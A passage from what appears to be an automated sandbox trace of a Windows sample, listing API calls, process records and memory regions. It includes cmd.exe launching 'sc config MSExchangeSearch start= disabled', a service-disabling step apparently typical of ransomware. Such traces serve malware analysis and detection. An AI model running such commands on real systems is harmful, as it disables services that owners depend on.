lpFindFileData=0x4a1f400 | out: lpFindFileData=0x4a1f400) returned 0x4d105c8 [0132.989] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0132.990] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0132.990] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4a1f400 | out: lpFindFileData=0x4a1f400) returned 0x4d105c8 [0132.990] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0132.990] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.990] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0132.990] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0132.990] GetEnvironmentStringsW () returned 0x4d17d98* [0132.990] FreeEnvironmentStringsA (penv="=") returned 1 [0132.990] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.990] GetConsoleOutputCP () returned 0x1b5 [0132.990] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.990] GetUserDefaultLCID () returned 0x409 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4a1f7b0, cchData=128 | out: lpLCData="0") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4a1f7b0, cchData=128 | out: lpLCData="0") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4a1f7b0, cchData=128 | out: lpLCData="1") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0132.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0132.991] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.992] GetConsoleTitleW (in: lpConsoleTitle=0x4d1aa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.992] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.992] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0132.992] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0132.992] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0132.992] _wcsicmp (_String1="sc", _String2=")") returned 74 [0132.993] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0132.993] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0132.993] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0132.993] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0132.993] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0132.993] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0132.994] GetConsoleTitleW (in: lpConsoleTitle=0x4a1f498, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.994] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.994] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.994] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.994] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.994] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.994] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.994] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.994] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.994] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.994] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.994] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.994] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.994] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.994] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.994] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.994] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.994] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.994] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.994] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.994] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.994] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.994] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.994] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.994] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.994] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.994] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.994] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.994] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.994] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.994] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.994] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.994] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.994] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.995] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.995] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.995] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.995] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.995] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.995] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.995] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.995] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.995] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.995] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.995] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.995] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.995] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.995] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.995] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.995] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.995] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.995] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.995] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.995] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.995] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.995] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.995] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.995] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.995] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.995] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.995] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.995] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.995] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.995] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.995] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.995] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.995] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.995] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.995] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.995] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.995] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.995] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.995] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.996] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0132.996] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0132.996] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0132.996] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0132.996] SetErrorMode (uMode=0x0) returned 0x0 [0132.996] SetErrorMode (uMode=0x1) returned 0x0 [0132.996] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d105d0, lpFilePart=0x4a1efa4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a1efa4*="Desktop") returned 0x1d [0132.996] SetErrorMode (uMode=0x0) returned 0x1 [0132.996] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.996] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.004] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.004] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.004] GetConsoleTitleW (in: lpConsoleTitle=0x4a1f224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.004] InitializeProcThreadAttributeList (in: lpAttributeList=0x4a1f150, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4a1f134 | out: lpAttributeList=0x4a1f150, lpSize=0x4a1f134) returned 1 [0133.004] UpdateProcThreadAttribute (in: lpAttributeList=0x4a1f150, dwFlags=0x0, Attribute=0x60001, lpValue=0x4a1f13c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4a1f150, lpPreviousValue=0x0) returned 1 [0133.005] GetStartupInfoW (in: lpStartupInfo=0x4a1f188 | out: lpStartupInfo=0x4a1f188*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.005] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.005] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.007] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeSearch start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4a1f0d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeSearch start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4a1f124 | out: lpCommandLine="sc config MSExchangeSearch start= disabled", lpProcessInformation=0x4a1f124*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc50, dwThreadId=0x2d0)) returned 1 [0133.016] CloseHandle (hObject=0xa4) returned 1 [0133.016] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.016] GetEnvironmentStringsW () returned 0x4d19f00* [0133.016] FreeEnvironmentStringsA (penv="=") returned 1 [0133.016] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0133.063] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4a1f0bc | out: lpExitCode=0x4a1f0bc*=0x424) returned 1 [0133.063] CloseHandle (hObject=0xa8) returned 1 [0133.064] _vsnwprintf (in: _Buffer=0x4a1f1a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4a1f0c4 | out: _Buffer="00000424") returned 8 [0133.064] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0133.064] GetEnvironmentStringsW () returned 0x4d1b388* [0133.064] FreeEnvironmentStringsA (penv="=") returned 1 [0133.064] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.064] GetEnvironmentStringsW () returned 0x4d1b388* [0133.064] FreeEnvironmentStringsA (penv="=") returned 1 [0133.064] DeleteProcThreadAttributeList (in: lpAttributeList=0x4a1f150 | out: lpAttributeList=0x4a1f150) [0133.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.064] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.064] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.064] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.065] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.065] SetConsoleInputExeNameW () returned 0x1 [0133.065] GetConsoleOutputCP () returned 0x1b5 [0133.065] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.065] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.065] exit (_Code=1060) Thread: id = 534 os_tid = 0xc48 Process: id = "162" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7b77000" os_pid = "0x77c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "161" os_parent_pid = "0xb3c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8537 start_va = 0x7f09d000 end_va = 0x7f09dfff entry_point = 0x0 region_type = private name = "private_0x000000007f09d000" filename = "" Region: id = 8538 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8539 start_va = 0x18bb220000 end_va = 0x18bb23ffff entry_point = 0x0 region_type = private name = "private_0x00000018bb220000" filename = "" Region: id = 8540 start_va = 0x18bb240000 end_va = 0x18bb253fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb240000" filename = "" Region: id = 8541 start_va = 0x18bb260000 end_va = 0x18bb29ffff entry_point = 0x0 region_type = private name = "private_0x00000018bb260000" filename = "" Region: id = 8542 start_va = 0x7df5ff8c0000 end_va = 0x7ff5ff8bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8c0000" filename = "" Region: id = 8543 start_va = 0x7ff6c4740000 end_va = 0x7ff6c4762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4740000" filename = "" Region: id = 8544 start_va = 0x7ff6c4765000 end_va = 0x7ff6c4765fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4765000" filename = "" Region: id = 8545 start_va = 0x7ff6c476e000 end_va = 0x7ff6c476ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c476e000" filename = "" Region: id = 8546 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8547 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8548 start_va = 0x18bb220000 end_va = 0x18bb22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb220000" filename = "" Region: id = 8549 start_va = 0x18bb230000 end_va = 0x18bb236fff entry_point = 0x0 region_type = private name = "private_0x00000018bb230000" filename = "" Region: id = 8550 start_va = 0x18bb2a0000 end_va = 0x18bb35dfff entry_point = 0x18bb2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8551 start_va = 0x18bb360000 end_va = 0x18bb39ffff entry_point = 0x0 region_type = private name = "private_0x00000018bb360000" filename = "" Region: id = 8552 start_va = 0x18bb3a0000 end_va = 0x18bb3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb3a0000" filename = "" Region: id = 8553 start_va = 0x18bb3b0000 end_va = 0x18bb3b6fff entry_point = 0x0 region_type = private name = "private_0x00000018bb3b0000" filename = "" Region: id = 8554 start_va = 0x18bb3c0000 end_va = 0x18bb3c0fff entry_point = 0x0 region_type = private name = "private_0x00000018bb3c0000" filename = "" Region: id = 8555 start_va = 0x18bb3d0000 end_va = 0x18bb3d0fff entry_point = 0x0 region_type = private name = "private_0x00000018bb3d0000" filename = "" Region: id = 8556 start_va = 0x18bb450000 end_va = 0x18bb54ffff entry_point = 0x0 region_type = private name = "private_0x00000018bb450000" filename = "" Region: id = 8557 start_va = 0x18bb670000 end_va = 0x18bb67ffff entry_point = 0x0 region_type = private name = "private_0x00000018bb670000" filename = "" Region: id = 8558 start_va = 0x18bb680000 end_va = 0x18bb807fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb680000" filename = "" Region: id = 8559 start_va = 0x18bb810000 end_va = 0x18bb990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb810000" filename = "" Region: id = 8560 start_va = 0x18bb9a0000 end_va = 0x18bcd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018bb9a0000" filename = "" Region: id = 8561 start_va = 0x7ff6c4640000 end_va = 0x7ff6c473ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4640000" filename = "" Region: id = 8562 start_va = 0x7ff6c476c000 end_va = 0x7ff6c476dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c476c000" filename = "" Region: id = 8563 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8564 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8565 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8566 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8567 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8568 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8569 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8570 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8571 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8572 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8573 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8574 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8575 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8576 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 531 os_tid = 0xcd4 Thread: id = 532 os_tid = 0xcd8 Thread: id = 533 os_tid = 0xc34 Process: id = "163" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x109b0000" os_pid = "0xc50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "161" os_parent_pid = "0xb3c" cmd_line = "sc config MSExchangeSearch start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" 